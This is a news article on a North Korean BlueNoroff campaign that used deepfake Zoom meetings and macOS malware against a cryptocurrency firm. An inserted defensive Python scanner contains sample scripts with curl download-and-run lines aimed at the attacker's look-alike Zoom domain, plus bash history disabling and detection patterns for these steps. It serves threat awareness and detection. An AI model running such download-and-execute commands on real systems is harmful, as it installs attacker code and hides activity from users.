North Korean Hackers Target Crypto With Mac Malware

Cybersecurity firm Huntress has uncovered a highly sophisticated hacking campaign targeting Mac users in the cryptocurrency sector, which utilized deepfake Zoom calls, clever social engineering, and Mac-specific malware in an unusually sophisticated operation.

Huntress began investigating the intrusion on June 11, 2025, after a partner reported suspicious activity. The attack was ultimately attributed to the North Korean hacking group BlueNoroff (also known as Sapphire Sleet or TA444), which has been targeting the cryptocurrency sector with financially driven campaigns since at least 2017.

The hackers specifically target macOS users by using deepfake technology to impersonate company executives in fake Zoom meetings to steal cryptocurrency.

How Does the Scam Work?

It all started when an employee (target) at a cryptocurrency foundation received a seemingly innocuous message from an external contact on their Telegram requesting a meeting. The attacker shared a Calendly link that appeared to schedule a Google Meet call, but clicking it redirected the user to a fake Zoom domain controlled by the threat actor.

Several weeks later, the employee joined a “Zoom meeting” populated by deepfakes mimicking senior leadership within their company, along with external contacts. During the meeting, the employee was unable to use their microphone, and the deepfakes instructed them to download a “Zoom extension”. The link to this extension, sent to them via Telegram, turned out to be a malicious AppleScript file (zoom_sdk_support.scpt) disguised as a troubleshooting tool.

Once downloaded, the AppleScript first opened a legitimate webpage for Zoom SDKs, but after over 10,500 blank lines, it downloaded a payload from a malicious website, https[://]support[.]us05web-zoom[.]biz, and executed it.

By the time Huntress began their investigation, the final payload had already been removed from the attacker’s server. However, they were able to find a version on VirusTotal that offered valuable insight into what the malware was designed to do.

“The script begins by disabling bash history logging and then checks if Rosetta 2, which allows Apple Silicon Macs to run x86_64 binaries, is installed,” the Huntress researchers explained in a blog post on Wednesday.

“If it isn’t, it silently installs it to ensure x86_64 payloads can run. It then creates a file called .pwd, which is hidden from the user’s view due to the period prepending it, and downloads the payload from the malicious, fake Zoom page to /tmp/icloud_helper.”
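The dropper and stage-two behaviours described above can be turned into a simple triage check for scripts arriving through chat apps. The following is an added example, not Huntress's tooling or anything from the original article: a Python scanner that flags the traits the write-up reports (a run of thousands of blank lines, a download into /tmp/icloud_helper, bash history being disabled, a Rosetta 2 install, a hidden .pwd file) and, going one step beyond the single domain named above, any URL whose host contains "zoom" but is not zoom.us or a subdomain of it. The command strings in the sample scripts, the 1,000-blank-line threshold and the scoring are assumptions; the three sample scripts are constructed for the example, not the actual malware.

```python
import re
from urllib.parse import urlparse

# Heuristics mirror the behaviours the Huntress write-up describes: an AppleScript
# dropper padded with thousands of blank lines, a download into /tmp/icloud_helper,
# bash history being disabled, Rosetta 2 being installed if absent, a hidden .pwd
# file, and a look-alike Zoom domain. The command strings below are assumptions
# for this example; the article does not reproduce the scripts verbatim.
BLANK_PAD_THRESHOLD = 1000  # assumption: no legitimate script carries 1,000+ consecutive empty lines

SUSPICIOUS_PATTERNS = {
    "history_disabled": re.compile(r"unset\s+HISTFILE|HISTFILE=/dev/null|set\s+\+o\s+history|HISTSIZE=0"),
    "rosetta_install": re.compile(r"softwareupdate\s+--install-rosetta"),
    "hidden_pwd_file": re.compile(r"(?:^|[\s/\"'])\.pwd\b"),
    "tmp_icloud_helper": re.compile(r"/tmp/icloud_helper\b"),
    "download_and_run": re.compile(r"do shell script|curl[^|\n]*\|\s*(?:ba)?sh\b"),
}

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def longest_blank_run(lines):
    """Length of the longest run of consecutive whitespace-only lines."""
    best = cur = 0
    for line in lines:
        cur = cur + 1 if not line.strip() else 0
        best = max(best, cur)
    return best


def lookalike_zoom_hosts(text):
    """Hosts that contain 'zoom' but are neither zoom.us nor a subdomain of it."""
    hosts = []
    for url in URL_RE.findall(text):
        host = (urlparse(url).hostname or "").lower()
        if "zoom" in host and host != "zoom.us" and not host.endswith(".zoom.us"):
            hosts.append(host)
    return hosts


def scan_script(text):
    """Return padding length, matched indicators with line numbers, look-alike hosts and a verdict."""
    lines = text.splitlines()
    blank_run = longest_blank_run(lines)
    padded = blank_run >= BLANK_PAD_THRESHOLD
    indicators = {}
    for lineno, line in enumerate(lines, 1):
        for name, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(line):
                indicators.setdefault(name, []).append(lineno)
    hosts = lookalike_zoom_hosts(text)
    # Padding counts double: on its own it is already a strong sign of a disguised script.
    score = (2 if padded else 0) + len(indicators) + (1 if hosts else 0)
    verdict = "malicious" if score >= 3 else ("suspicious" if score else "clean")
    return {
        "max_blank_run": blank_run,
        "padded": padded,
        "indicators": indicators,
        "lookalike_hosts": hosts,
        "score": score,
        "verdict": verdict,
    }


# Constructed samples (not the real malware): a dropper shaped like the one described,
# a stage-two shell script with the reported behaviours, and a harmless AppleScript.
SAMPLE_DROPPER = (
    'open location "https://zoom.us/"  -- decoy page shown to the user\n'
    + "\n" * 10500
    + 'do shell script "curl -fsSL https://support.us05web-zoom.biz/sdk -o /tmp/icloud_helper '
    '&& chmod +x /tmp/icloud_helper && /tmp/icloud_helper"\n'
)

SAMPLE_STAGE2 = """#!/bin/bash
unset HISTFILE
if ! /usr/bin/pgrep -q oahd; then
    /usr/sbin/softwareupdate --install-rosetta --agree-to-license >/dev/null 2>&1
fi
touch "$HOME/.pwd"
curl -fsSL https://support.us05web-zoom.biz/helper -o /tmp/icloud_helper
chmod +x /tmp/icloud_helper && /tmp/icloud_helper
"""

SAMPLE_BENIGN = 'display dialog "Opening the Zoom SDK docs"\nopen location "https://zoom.us/"\n'

if __name__ == "__main__":
    for name, sample in (("dropper", SAMPLE_DROPPER), ("stage2", SAMPLE_STAGE2), ("benign", SAMPLE_BENIGN)):
        result = scan_script(sample)
        print(f"{name:8s} verdict={result['verdict']} score={result['score']} "
              f"blank_run={result['max_blank_run']} indicators={sorted(result['indicators'])}")
```

The blank-line check is the cheapest and most robust of these signals: a script that is mostly empty lines with a live command thousands of lines down has no legitimate reason to look that way, whereas the string-based indicators can be renamed by the next campaign and should be treated as a starting list rather than a complete one.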

A Tailored, Mac-Specific Malware

Unlike standard off-the-shelf malware, this attack involved a custom-built toolkit with at least eight separate components, all specifically tailored for macOS. They were:

  • Telegram 2: The persistent binary, written in Nim, which was responsible for starting the primary backdoor.
  • Root Troy V4 (remoted): A full-featured backdoor written in Go, capable of downloading and executing other malicious tools.
  • InjectWithDyld (“a”): A C++ binary loader downloaded by Root Troy V4, responsible for decrypting and loading two additional implants.
    • Base App: A seemingly harmless Swift application that serves as the injection target for malicious code.
    • Payload: A different implant written in Nim, designed to execute commands on the infected system.
  • XScreen (keyboardd): A powerful keylogger written in Objective-C, capable of capturing keystrokes, clipboard content, and screen activity.
  • CryptoBot (airmond): A Go-based tool designed to collect cryptocurrency-related files from the victim’s machine.
  • NetChk: A decoy binary with no meaningful function that generates random numbers forever, likely included for obfuscation or misdirection.

Notably, the malware used clever tricks to avoid detection, such as only executing commands when the Mac’s display was asleep. It was carefully crafted to bypass macOS security layers using AppleScript and process injection.

Warning Call for macOS Users

Historically, macOS has been seen as a safer operating system, but that perception is increasingly outdated. As more businesses adopt Macs and remote work becomes standard, attackers are adapting quickly.

“Over the last few years, we have seen macOS become a larger target for threat actors, especially with regard to highly sophisticated, state-sponsored attackers,” Huntress’ researchers noted. “As these attacks and the frequency in which they occur continue to rise, it will be ever more important to protect your Macs.”

This campaign makes one thing clear: when state-backed groups like BlueNoroff are involved, even a video call isn’t always what it seems.

Kavita Iyer, https://www.techworm.net